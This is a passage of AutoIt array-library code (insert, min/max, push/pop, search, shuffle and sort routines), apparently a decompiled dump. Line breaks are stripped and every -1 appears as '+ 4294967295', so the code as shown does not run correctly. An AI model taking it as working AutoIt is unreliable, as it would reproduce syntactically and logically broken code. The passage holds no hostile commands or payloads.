$SDELIM_ITEM = "|" IF $SDELIM_ROW = DEFAULT THEN $SDELIM_ROW = @CRLF IF $IFORCE = DEFAULT THEN $IFORCE = $ARRAYFILL_FORCE_DEFAULT IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 LOCAL $HDATATYPE = 0 SWITCH $IFORCE CASE $ARRAYFILL_FORCE_INT $HDATATYPE = INT CASE $ARRAYFILL_FORCE_NUMBER $HDATATYPE = NUMBER CASE $ARRAYFILL_FORCE_PTR $HDATATYPE = PTR CASE $ARRAYFILL_FORCE_HWND $HDATATYPE = HWND CASE $ARRAYFILL_FORCE_STRING $HDATATYPE = STRING ENDSWITCH LOCAL $ASPLIT_1 , $ASPLIT_2 IF ISARRAY ($VRANGE ) THEN IF UBOUND ($VRANGE , $UBOUND_DIMENSIONS ) <> 1 OR UBOUND ($VRANGE , $UBOUND_ROWS ) < 2 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) ELSE LOCAL $INUMBER $VRANGE = STRINGSTRIPWS ($VRANGE , 8 ) $ASPLIT_1 = STRINGSPLIT ($VRANGE , ";" ) $VRANGE = "" FOR $I = 1 TO $ASPLIT_1 [0 ] IF NOT STRINGREGEXP ($ASPLIT_1 [$I ] , "^\d+(-\d+)?$" ) THEN RETURN SETERROR (3 , 0 , + 4294967295 ) $ASPLIT_2 = STRINGSPLIT ($ASPLIT_1 [$I ] , "-" ) SWITCH $ASPLIT_2 [0 ] CASE 1 $VRANGE &= $ASPLIT_2 [1 ] & ";" CASE 2 IF NUMBER ($ASPLIT_2 [2 ] ) >= NUMBER ($ASPLIT_2 [1 ] ) THEN $INUMBER = $ASPLIT_2 [1 ] + 4294967295 DO $INUMBER += 1 $VRANGE &= $INUMBER & ";" UNTIL $INUMBER = $ASPLIT_2 [2 ] ENDIF ENDSWITCH NEXT $VRANGE = STRINGSPLIT (STRINGTRIMRIGHT ($VRANGE , 1 ) , ";" ) ENDIF IF $VRANGE [1 ] < 0 OR $VRANGE [$VRANGE [0 ] ] > $IDIM_1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) FOR $I = 2 TO $VRANGE [0 ] IF $VRANGE [$I ] < $VRANGE [$I + 4294967295 ] THEN RETURN SETERROR (3 , 0 , + 4294967295 ) NEXT LOCAL $ICOPYTO_INDEX = $IDIM_1 + $VRANGE [0 ] LOCAL $IINSERTPOINT_INDEX = $VRANGE [0 ] LOCAL $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $IFORCE = $ARRAYFILL_FORCE_SINGLEITEM THEN REDIM $AARRAY [$IDIM_1 + $VRANGE [0 ] + 1 ] FOR $IREADFROMINDEX = $IDIM_1 TO 0 STEP + 4294967295 $AARRAY [$ICOPYTO_INDEX ] = $AARRAY [$IREADFROMINDEX ] $ICOPYTO_INDEX -= 1 $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] WHILE $IREADFROMINDEX = $IINSERT_INDEX $AARRAY [$ICOPYTO_INDEX ] = $VVALUE $ICOPYTO_INDEX -= 1 $IINSERTPOINT_INDEX -= 1 IF $IINSERTPOINT_INDEX < 1 THEN EXITLOOP 2 $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] WEND NEXT RETURN $IDIM_1 + $VRANGE [0 ] + 1 ENDIF REDIM $AARRAY [$IDIM_1 + $VRANGE [0 ] + 1 ] IF ISARRAY ($VVALUE ) THEN IF UBOUND ($VVALUE , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) $HDATATYPE = 0 ELSE LOCAL $ATMP = STRINGSPLIT ($VVALUE , $SDELIM_ITEM , $STR_NOCOUNT + $STR_ENTIRESPLIT ) IF UBOUND ($ATMP , $UBOUND_ROWS ) = 1 THEN $ATMP [0 ] = $VVALUE $HDATATYPE = 0 ENDIF $VVALUE = $ATMP ENDIF FOR $IREADFROMINDEX = $IDIM_1 TO 0 STEP + 4294967295 $AARRAY [$ICOPYTO_INDEX ] = $AARRAY [$IREADFROMINDEX ] $ICOPYTO_INDEX -= 1 $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] WHILE $IREADFROMINDEX = $IINSERT_INDEX IF $IINSERTPOINT_INDEX <= UBOUND ($VVALUE , $UBOUND_ROWS ) THEN IF ISFUNC ($HDATATYPE ) THEN $AARRAY [$ICOPYTO_INDEX ] = $HDATATYPE ($VVALUE [$IINSERTPOINT_INDEX + 4294967295 ] ) ELSE $AARRAY [$ICOPYTO_INDEX ] = $VVALUE [$IINSERTPOINT_INDEX + 4294967295 ] ENDIF ELSE $AARRAY [$ICOPYTO_INDEX ] = "" ENDIF $ICOPYTO_INDEX -= 1 $IINSERTPOINT_INDEX -= 1 IF $IINSERTPOINT_INDEX = 0 THEN EXITLOOP 2 $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] WEND NEXT CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $ISTART < 0 OR $ISTART > $IDIM_2 + 4294967295 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) LOCAL $IVALDIM_1 , $IVALDIM_2 IF ISARRAY ($VVALUE ) THEN IF UBOUND ($VVALUE , $UBOUND_DIMENSIONS ) <> 2 THEN RETURN SETERROR (7 , 0 , + 4294967295 ) $IVALDIM_1 = UBOUND ($VVALUE , $UBOUND_ROWS ) $IVALDIM_2 = UBOUND ($VVALUE , $UBOUND_COLUMNS ) $HDATATYPE = 0 ELSE $ASPLIT_1 = STRINGSPLIT ($VVALUE , $SDELIM_ROW , $STR_NOCOUNT + $STR_ENTIRESPLIT ) $IVALDIM_1 = UBOUND ($ASPLIT_1 , $UBOUND_ROWS ) STRINGREPLACE ($ASPLIT_1 [0 ] , $SDELIM_ITEM , "" ) $IVALDIM_2 = @EXTENDED + 1 LOCAL $ATMP [$IVALDIM_1 ] [$IVALDIM_2 ] FOR $I = 0 TO $IVALDIM_1 + 4294967295 $ASPLIT_2 = STRINGSPLIT ($ASPLIT_1 [$I ] , $SDELIM_ITEM , $STR_NOCOUNT + $STR_ENTIRESPLIT ) FOR $J = 0 TO $IVALDIM_2 + 4294967295 $ATMP [$I ] [$J ] = $ASPLIT_2 [$J ] NEXT NEXT $VVALUE = $ATMP ENDIF IF UBOUND ($VVALUE , $UBOUND_COLUMNS ) + $ISTART > UBOUND ($AARRAY , $UBOUND_COLUMNS ) THEN RETURN SETERROR (8 , 0 , + 4294967295 ) REDIM $AARRAY [$IDIM_1 + $VRANGE [0 ] + 1 ] [$IDIM_2 ] FOR $IREADFROMINDEX = $IDIM_1 TO 0 STEP + 4294967295 FOR $J = 0 TO $IDIM_2 + 4294967295 $AARRAY [$ICOPYTO_INDEX ] [$J ] = $AARRAY [$IREADFROMINDEX ] [$J ] NEXT $ICOPYTO_INDEX -= 1 $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] WHILE $IREADFROMINDEX = $IINSERT_INDEX FOR $J = 0 TO $IDIM_2 + 4294967295 IF $J < $ISTART THEN $AARRAY [$ICOPYTO_INDEX ] [$J ] = "" ELSEIF $J - $ISTART > $IVALDIM_2 + 4294967295 THEN $AARRAY [$ICOPYTO_INDEX ] [$J ] = "" ELSE IF $IINSERTPOINT_INDEX + 4294967295 < $IVALDIM_1 THEN IF ISFUNC ($HDATATYPE ) THEN $AARRAY [$ICOPYTO_INDEX ] [$J ] = $HDATATYPE ($VVALUE [$IINSERTPOINT_INDEX + 4294967295 ] [$J - $ISTART ] ) ELSE $AARRAY [$ICOPYTO_INDEX ] [$J ] = $VVALUE [$IINSERTPOINT_INDEX + 4294967295 ] [$J - $ISTART ] ENDIF ELSE $AARRAY [$ICOPYTO_INDEX ] [$J ] = "" ENDIF ENDIF NEXT $ICOPYTO_INDEX -= 1 $IINSERTPOINT_INDEX -= 1 IF $IINSERTPOINT_INDEX = 0 THEN EXITLOOP 2 $IINSERT_INDEX = $VRANGE [$IINSERTPOINT_INDEX ] WEND NEXT CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_ROWS ) ENDFUNC FUNC _ARRAYMAX (CONST BYREF $AARRAY , $ICOMPNUMERIC = 0 , $ISTART = + 4294967295 , $IEND = + 4294967295 , $ISUBITEM = 0 ) LOCAL $IRESULT = _ARRAYMAXINDEX ($AARRAY , $ICOMPNUMERIC , $ISTART , $IEND , $ISUBITEM ) IF @ERROR THEN RETURN SETERROR (@ERROR , 0 , "" ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) = 1 THEN RETURN $AARRAY [$IRESULT ] ELSE RETURN $AARRAY [$IRESULT ] [$ISUBITEM ] ENDIF ENDFUNC FUNC _ARRAYMAXINDEX (CONST BYREF $AARRAY , $ICOMPNUMERIC = 0 , $ISTART = + 4294967295 , $IEND = + 4294967295 , $ISUBITEM = 0 ) IF $ICOMPNUMERIC = DEFAULT THEN $ICOMPNUMERIC = 0 IF $ISTART = DEFAULT THEN $ISTART = + 4294967295 IF $IEND = DEFAULT THEN $IEND = + 4294967295 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 LOCAL $IRET = __ARRAY_MINMAXINDEX ($AARRAY , $ICOMPNUMERIC , $ISTART , $IEND , $ISUBITEM , __ARRAY_GREATERTHAN ) RETURN SETERROR (@ERROR , 0 , $IRET ) ENDFUNC FUNC _ARRAYMIN (CONST BYREF $AARRAY , $ICOMPNUMERIC = 0 , $ISTART = + 4294967295 , $IEND = + 4294967295 , $ISUBITEM = 0 ) LOCAL $IRESULT = _ARRAYMININDEX ($AARRAY , $ICOMPNUMERIC , $ISTART , $IEND , $ISUBITEM ) IF @ERROR THEN RETURN SETERROR (@ERROR , 0 , "" ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) = 1 THEN RETURN $AARRAY [$IRESULT ] ELSE RETURN $AARRAY [$IRESULT ] [$ISUBITEM ] ENDIF ENDFUNC FUNC _ARRAYMININDEX (CONST BYREF $AARRAY , $ICOMPNUMERIC = 0 , $ISTART = + 4294967295 , $IEND = + 4294967295 , $ISUBITEM = 0 ) IF $ICOMPNUMERIC = DEFAULT THEN $ICOMPNUMERIC = 0 IF $ISTART = DEFAULT THEN $ISTART = + 4294967295 IF $IEND = DEFAULT THEN $IEND = + 4294967295 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 LOCAL $IRET = __ARRAY_MINMAXINDEX ($AARRAY , $ICOMPNUMERIC , $ISTART , $IEND , $ISUBITEM , __ARRAY_LESSTHAN ) RETURN SETERROR (@ERROR , 0 , $IRET ) ENDFUNC FUNC _ARRAYPERMUTE (BYREF $AARRAY , $SDELIMITER = "" ) IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "" IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $ISIZE = UBOUND ($AARRAY ) , $IFACTORIAL = 1 , $AIDX [$ISIZE ] , $ARESULT [1 ] , $ICOUNT = 1 IF UBOUND ($AARRAY ) THEN FOR $I = 0 TO $ISIZE + 4294967295 $AIDX [$I ] = $I NEXT FOR $I = $ISIZE TO 1 STEP + 4294967295 $IFACTORIAL *= $I NEXT REDIM $ARESULT [$IFACTORIAL + 1 ] $ARESULT [0 ] = $IFACTORIAL __ARRAY_EXETERINTERNAL ($AARRAY , 0 , $ISIZE , $SDELIMITER , $AIDX , $ARESULT , $ICOUNT ) ELSE $ARESULT [0 ] = 0 ENDIF RETURN $ARESULT ENDFUNC FUNC _ARRAYPOP (BYREF $AARRAY ) IF (NOT ISARRAY ($AARRAY ) ) THEN RETURN SETERROR (1 , 0 , "" ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (2 , 0 , "" ) LOCAL $IUBOUND = UBOUND ($AARRAY ) + 4294967295 IF $IUBOUND = + 4294967295 THEN RETURN SETERROR (3 , 0 , "" ) LOCAL $SLASTVAL = $AARRAY [$IUBOUND ] IF $IUBOUND > + 4294967295 THEN REDIM $AARRAY [$IUBOUND ] ENDIF RETURN $SLASTVAL ENDFUNC FUNC _ARRAYPUSH (BYREF $AARRAY , $VVALUE , $IDIRECTION = 0 ) IF $IDIRECTION = DEFAULT THEN $IDIRECTION = 0 IF (NOT ISARRAY ($AARRAY ) ) THEN RETURN SETERROR (1 , 0 , 0 ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (3 , 0 , 0 ) LOCAL $IUBOUND = UBOUND ($AARRAY ) + 4294967295 IF ISARRAY ($VVALUE ) THEN LOCAL $IUBOUNDS = UBOUND ($VVALUE ) IF ($IUBOUNDS + 4294967295 ) > $IUBOUND THEN RETURN SETERROR (2 , 0 , 0 ) IF $IDIRECTION THEN FOR $I = $IUBOUND TO $IUBOUNDS STEP + 4294967295 $AARRAY [$I ] = $AARRAY [$I - $IUBOUNDS ] NEXT FOR $I = 0 TO $IUBOUNDS + 4294967295 $AARRAY [$I ] = $VVALUE [$I ] NEXT ELSE FOR $I = 0 TO $IUBOUND - $IUBOUNDS $AARRAY [$I ] = $AARRAY [$I + $IUBOUNDS ] NEXT FOR $I = 0 TO $IUBOUNDS + 4294967295 $AARRAY [$I + $IUBOUND - $IUBOUNDS + 1 ] = $VVALUE [$I ] NEXT ENDIF ELSE IF $IUBOUND > + 4294967295 THEN IF $IDIRECTION THEN FOR $I = $IUBOUND TO 1 STEP + 4294967295 $AARRAY [$I ] = $AARRAY [$I + 4294967295 ] NEXT $AARRAY [0 ] = $VVALUE ELSE FOR $I = 0 TO $IUBOUND + 4294967295 $AARRAY [$I ] = $AARRAY [$I + 1 ] NEXT $AARRAY [$IUBOUND ] = $VVALUE ENDIF ENDIF ENDIF RETURN 1 ENDFUNC FUNC _ARRAYREVERSE (BYREF $AARRAY , $ISTART = 0 , $IEND = 0 ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (3 , 0 , 0 ) IF NOT UBOUND ($AARRAY ) THEN RETURN SETERROR (4 , 0 , 0 ) LOCAL $VTMP , $IUBOUND = UBOUND ($AARRAY ) + 4294967295 IF $IEND < 1 OR $IEND > $IUBOUND THEN $IEND = $IUBOUND IF $ISTART < 0 THEN $ISTART = 0 IF $ISTART > $IEND THEN RETURN SETERROR (2 , 0 , 0 ) FOR $I = $ISTART TO INT (($ISTART + $IEND + 4294967295 ) / 2 ) $VTMP = $AARRAY [$I ] $AARRAY [$I ] = $AARRAY [$IEND ] $AARRAY [$IEND ] = $VTMP $IEND -= 1 NEXT RETURN 1 ENDFUNC FUNC _ARRAYSEARCH (CONST BYREF $AARRAY , $VVALUE , $ISTART = 0 , $IEND = 0 , $ICASE = 0 , $ICOMPARE = 0 , $IFORWARD = 1 , $ISUBITEM = + 4294967295 , $BROW = FALSE ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ICASE = DEFAULT THEN $ICASE = 0 IF $ICOMPARE = DEFAULT THEN $ICOMPARE = 0 IF $IFORWARD = DEFAULT THEN $IFORWARD = 1 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = + 4294967295 IF $BROW = DEFAULT THEN $BROW = FALSE IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY ) + 4294967295 IF $IDIM_1 = + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 LOCAL $BCOMPTYPE = FALSE IF $ICOMPARE = 2 THEN $ICOMPARE = 0 $BCOMPTYPE = TRUE ENDIF IF $BROW THEN IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) = 1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $IEND < 1 OR $IEND > $IDIM_2 THEN $IEND = $IDIM_2 IF $ISTART < 0 THEN $ISTART = 0 IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) ELSE IF $IEND < 1 OR $IEND > $IDIM_1 THEN $IEND = $IDIM_1 IF $ISTART < 0 THEN $ISTART = 0 IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) ENDIF LOCAL $ISTEP = 1 IF NOT $IFORWARD THEN LOCAL $ITMP = $ISTART $ISTART = $IEND $IEND = $ITMP $ISTEP = + 4294967295 ENDIF SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF NOT $ICOMPARE THEN IF NOT $ICASE THEN FOR $I = $ISTART TO $IEND STEP $ISTEP IF $BCOMPTYPE AND VARGETTYPE ($AARRAY [$I ] ) <> VARGETTYPE ($VVALUE ) THEN CONTINUELOOP IF $AARRAY [$I ] = $VVALUE THEN RETURN $I NEXT ELSE FOR $I = $ISTART TO $IEND STEP $ISTEP IF $BCOMPTYPE AND VARGETTYPE ($AARRAY [$I ] ) <> VARGETTYPE ($VVALUE ) THEN CONTINUELOOP IF $AARRAY [$I ] == $VVALUE THEN RETURN $I NEXT ENDIF ELSE FOR $I = $ISTART TO $IEND STEP $ISTEP IF $ICOMPARE = 3 THEN IF STRINGREGEXP ($AARRAY [$I ] , $VVALUE ) THEN RETURN $I ELSE IF STRINGINSTR ($AARRAY [$I ] , $VVALUE , $ICASE ) > 0 THEN RETURN $I ENDIF NEXT ENDIF CASE 2 LOCAL $IDIM_SUB IF $BROW THEN $IDIM_SUB = $IDIM_1 IF $ISUBITEM > $IDIM_SUB THEN $ISUBITEM = $IDIM_SUB IF $ISUBITEM < 0 THEN $ISUBITEM = 0 ELSE $IDIM_SUB = $ISUBITEM ENDIF ELSE $IDIM_SUB = $IDIM_2 IF $ISUBITEM > $IDIM_SUB THEN $ISUBITEM = $IDIM_SUB IF $ISUBITEM < 0 THEN $ISUBITEM = 0 ELSE $IDIM_SUB = $ISUBITEM ENDIF ENDIF FOR $J = $ISUBITEM TO $IDIM_SUB IF NOT $ICOMPARE THEN IF NOT $ICASE THEN FOR $I = $ISTART TO $IEND STEP $ISTEP IF $BROW THEN IF $BCOMPTYPE AND VARGETTYPE ($AARRAY [$J ] [$J ] ) <> VARGETTYPE ($VVALUE ) THEN CONTINUELOOP IF $AARRAY [$J ] [$I ] = $VVALUE THEN RETURN $I ELSE IF $BCOMPTYPE AND VARGETTYPE ($AARRAY [$I ] [$J ] ) <> VARGETTYPE ($VVALUE ) THEN CONTINUELOOP IF $AARRAY [$I ] [$J ] = $VVALUE THEN RETURN $I ENDIF NEXT ELSE FOR $I = $ISTART TO $IEND STEP $ISTEP IF $BROW THEN IF $BCOMPTYPE AND VARGETTYPE ($AARRAY [$J ] [$I ] ) <> VARGETTYPE ($VVALUE ) THEN CONTINUELOOP IF $AARRAY [$J ] [$I ] == $VVALUE THEN RETURN $I ELSE IF $BCOMPTYPE AND VARGETTYPE ($AARRAY [$I ] [$J ] ) <> VARGETTYPE ($VVALUE ) THEN CONTINUELOOP IF $AARRAY [$I ] [$J ] == $VVALUE THEN RETURN $I ENDIF NEXT ENDIF ELSE FOR $I = $ISTART TO $IEND STEP $ISTEP IF $ICOMPARE = 3 THEN IF $BROW THEN IF STRINGREGEXP ($AARRAY [$J ] [$I ] , $VVALUE ) THEN RETURN $I ELSE IF STRINGREGEXP ($AARRAY [$I ] [$J ] , $VVALUE ) THEN RETURN $I ENDIF ELSE IF $BROW THEN IF STRINGINSTR ($AARRAY [$J ] [$I ] , $VVALUE , $ICASE ) > 0 THEN RETURN $I ELSE IF STRINGINSTR ($AARRAY [$I ] [$J ] , $VVALUE , $ICASE ) > 0 THEN RETURN $I ENDIF ENDIF NEXT ENDIF NEXT CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN SETERROR (6 , 0 , + 4294967295 ) ENDFUNC FUNC _ARRAYSHUFFLE (BYREF $AARRAY , $ISTART_ROW = 0 , $IEND_ROW = 0 , $ICOL = + 4294967295 ) IF $ISTART_ROW = DEFAULT THEN $ISTART_ROW = 0 IF $IEND_ROW = DEFAULT THEN $IEND_ROW = 0 IF $ICOL = DEFAULT THEN $ICOL = + 4294967295 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) IF $IEND_ROW = 0 THEN $IEND_ROW = $IDIM_1 + 4294967295 IF $ISTART_ROW < 0 OR $ISTART_ROW > $IDIM_1 + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $IEND_ROW < 1 OR $IEND_ROW > $IDIM_1 + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART_ROW > $IEND_ROW THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $VTMP , $IRAND SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 FOR $I = $IEND_ROW TO $ISTART_ROW + 1 STEP + 4294967295 $IRAND = RANDOM ($ISTART_ROW , $I , 1 ) $VTMP = $AARRAY [$I ] $AARRAY [$I ] = $AARRAY [$IRAND ] $AARRAY [$IRAND ] = $VTMP NEXT RETURN 1 CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $ICOL < + 4294967295 OR $ICOL > $IDIM_2 + 4294967295 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) LOCAL $ICOL_START , $ICOL_END IF $ICOL = + 4294967295 THEN $ICOL_START = 0 $ICOL_END = $IDIM_2 + 4294967295 ELSE $ICOL_START = $ICOL $ICOL_END = $ICOL ENDIF FOR $I = $IEND_ROW TO $ISTART_ROW + 1 STEP + 4294967295 $IRAND = RANDOM ($ISTART_ROW , $I , 1 ) FOR $J = $ICOL_START TO $ICOL_END $VTMP = $AARRAY [$I ] [$J ] $AARRAY [$I ] [$J ] = $AARRAY [$IRAND ] [$J ] $AARRAY [$IRAND ] [$J ] = $VTMP NEXT NEXT RETURN 1 CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH ENDFUNC FUNC _ARRAYSORT (BYREF $AARRAY , $IDESCENDING = 0 , $ISTART = 0 , $IEND = 0 , $ISUBITEM = 0 , $IPIVOT = 0 ) IF $IDESCENDING = DEFAULT THEN $IDESCENDING = 0 IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 IF $IPIVOT = DEFAULT THEN $IPIVOT = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IUBOUND = UBOUND ($AARRAY ) + 4294967295 IF $IUBOUND = + 4294967295 THEN RETURN SETERROR (5 , 0 , 0 ) IF $IEND = DEFAULT THEN $IEND = 0 IF $IEND < 1 OR $IEND > $IUBOUND OR $IEND = DEFAULT THEN $IEND = $IUBOUND IF $ISTART < 0 OR $ISTART = DEFAULT THEN $ISTART = 0 IF $ISTART > $IEND THEN RETURN SETERROR (2 , 0 , 0 ) IF $IDESCENDING = DEFAULT THEN $IDESCENDING = 0 IF $IPIVOT = DEFAULT THEN $IPIVOT = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $IPIVOT THEN __ARRAYDUALPIVOTSORT ($AARRAY , $ISTART , $IEND ) ELSE __ARRAYQUICKSORT1D ($AARRAY , $ISTART , $IEND ) ENDIF IF $IDESCENDING THEN _ARRAYREVERSE ($AARRAY , $ISTART , $IEND ) CASE 2 IF $IPIVOT THEN RETURN SETERROR (6 , 0 , 0 ) LOCAL $ISUBMAX = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $ISUBITEM > $ISUBMAX THEN RETURN SETERROR (3 , 0 , 0 ) IF $IDESCENDING THEN $IDESCENDING = + 4294967295 ELSE $IDESCENDING = 1 ENDIF __ARRAYQUICKSORT2D ($AARRAY , $IDESCENDING , $ISTART , $IEND , $ISUBITEM , $ISUBMAX ) CASE ELSE RETURN SETERROR (4 , 0 , 0 ) ENDSWITCH RETURN 1 ENDFUNC FUNC __ARRAYQUICKSORT1D (BYREF $AARRAY , CONST BYREF $ISTART , CONST BYREF $IEND ) IF $IEND <= $ISTART THEN RETURN LOCAL $VTMP IF ($IEND - $ISTART ) < 15 THEN LOCAL $VCUR FOR $I = $ISTART + 1 TO $IEND $VTMP = $AARRAY [$I ] IF ISNUMBER ($VTMP ) THEN FOR $J = $I + 4294967295 TO $ISTART STEP + 4294967295 $VCUR = $AARRAY [$J ] IF ($VTMP >= $VCUR AND ISNUMBER ($VCUR ) ) OR (NOT ISNUMBER ($VCUR ) AND STRINGCOMPARE ($VTMP , $VCUR ) >= 0 ) THEN EXITLOOP $AARRAY [$J + 1 ] = $VCUR NEXT ELSE FOR $J = $I + 4294967295 TO $ISTART STEP + 4294967295 IF (STRINGCOMPARE ($VTMP , $AARRAY [$J ] ) >= 0 ) THEN EXITLOOP $AARRAY [$J + 1 ] = $AARRAY [$J ] NEXT ENDIF $AARRAY [$J + 1 ] = $VTMP NEXT RETURN ENDIF LOCAL $L = $ISTART , $R = $IEND , $VPIVOT = $AARRAY [INT (($ISTART + $IEND ) / 2 ) ] , $BNUM = ISNUMBER ($VPIVOT ) DO IF $BNUM THEN WHILE ($AARRAY [$L ] < $VPIVOT AND ISNUMBER ($AARRAY [$L ] ) ) OR (NOT ISNUMBER ($AARRAY [$L ] ) AND STRINGCOMPARE ($AARRAY [$L ] , $VPIVOT ) < 0 ) $L += 1 WEND WHILE ($AARRAY [$R ] > $VPIVOT AND ISNUMBER ($AARRAY [$R ] ) ) OR (NOT ISNUMBER ($AARRAY [$R ] ) AND STRINGCOMPARE ($AARRAY [$R ] , $VPIVOT ) > 0 ) $R -= 1 WEND ELSE WHILE (STRINGCOMPARE ($AARRAY [$L ] , $VPIVOT ) < 0 ) $L += 1 WEND WHILE (STRINGCOMPARE ($AARRAY [$R ] , $VPIVOT ) > 0 ) $R -= 1 WEND ENDIF IF $L <= $R THEN $VTMP = $AARRAY [$L ] $AARRAY [$L ] = $AARRAY [$R ] $AARRAY [$R ] = $VTMP $L += 1 $R -= 1 ENDIF UNTIL $L > $R __ARRAYQUICKSORT1D ($AARRAY , $ISTART , $R ) __ARRAYQUICKSORT1D ($AARRAY , $L , $IEND ) ENDFUNC FUNC __ARRAYQUICKSORT2D (BYREF $AARRAY , CONST BYREF $ISTEP , CONST BYREF $ISTART , CONST BYREF $IEND , CONST BYREF $ISUBITEM , CONST BYREF $ISUBMAX ) IF $IEND <= $ISTART THEN RETURN LOCAL $VTMP , $L = $ISTART , $R = $IEND , $VPIVOT = $AARRAY [INT (($ISTART + $IEND ) / 2 ) ] [$ISUBITEM ] , $BNUM = ISNUMBER ($VPIVOT ) DO IF $BNUM THEN WHILE ($ISTEP * ($AARRAY [$L ] [$ISUBITEM ] - $VPIVOT ) < 0 AND ISNUMBER ($AARRAY [$L ] [$ISUBITEM ] ) ) OR (NOT ISNUMBER ($AARRAY [$L ] [$ISUBITEM ] ) AND $ISTEP * STRINGCOMPARE ($AARRAY [$L ] [$ISUBITEM ] , $VPIVOT ) < 0 ) $L += 1 WEND WHILE ($ISTEP * ($AARRAY [$R ] [$ISUBITEM ] - $VPIVOT ) > 0 AND ISNUMBER ($AARRAY [$R ] [$ISUBITEM ] ) ) OR (NOT ISNUMBER ($AARRAY [$R ] [$ISUBITEM ] ) AND $ISTEP * STRINGCOMPARE ($AARRAY [$R ] [$ISUBITEM ] , $VPIVOT ) > 0 ) $R -= 1 WEND ELSE WHILE ($ISTEP * STRINGCOMPARE ($AARRAY [$L ] [$ISUBITEM ] , $VPIVOT ) < 0 ) $L += 1 WEND WHILE ($ISTEP * STRINGCOMPARE ($AARRAY [$R ] [$ISUBITEM ] , $VPIVOT ) > 0 ) $R -= 1 WEND ENDIF IF $L <= $R THEN FOR $I = 0 TO $ISUBMAX $VTMP = $AARRAY [$L ] [$I ] $AARRAY [$L ] [$I ] = $AARRAY [$R ] [$I ] $AARRAY [$R ] [$I ] = $VTMP NEXT $L += 1 $R -= 1 ENDIF UNTIL $L > $R __ARRAYQUICKSORT2D ($AARRAY , $ISTEP , $ISTART , $R , $ISUBITEM , $ISUBMAX ) __ARRAYQUICKSORT2D ($AARRAY , $ISTEP , $L , $IEND , $ISUBITEM , $ISUBMAX ) ENDFUNC FUNC __ARRAYDUALPIVOTSORT (BYREF $AARRAY , $IPIVOT_LEFT , $IPIVOT_RIGHT , $BLEFTMOST = TRUE ) IF $IPIVOT_LEFT > $IPIVOT_RIGHT THEN RETURN LOCAL $ILENGTH = $IPIVOT_RIGHT - $IPIVOT_LEFT + 1 LOCAL $I , $J , $K , $IAI , $IAK , $IA1 , $IA2 , $ILAST IF $ILENGTH < 45 THEN IF $BLEFTMOST THEN $I = $IPIVOT_LEFT WHILE $I < $IPIVOT_RIGHT $J = $I $IAI = $AARRAY [$I + 1 ] WHILE $IAI < $AARRAY [$J ] 